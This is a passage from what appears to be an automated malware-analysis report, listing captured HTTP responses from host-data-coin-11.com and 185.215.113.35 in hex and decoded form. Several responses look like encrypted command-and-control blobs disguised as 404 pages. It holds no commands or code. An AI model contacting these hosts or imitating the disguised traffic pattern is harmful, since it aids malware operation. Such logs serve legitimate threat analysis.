3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 01 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
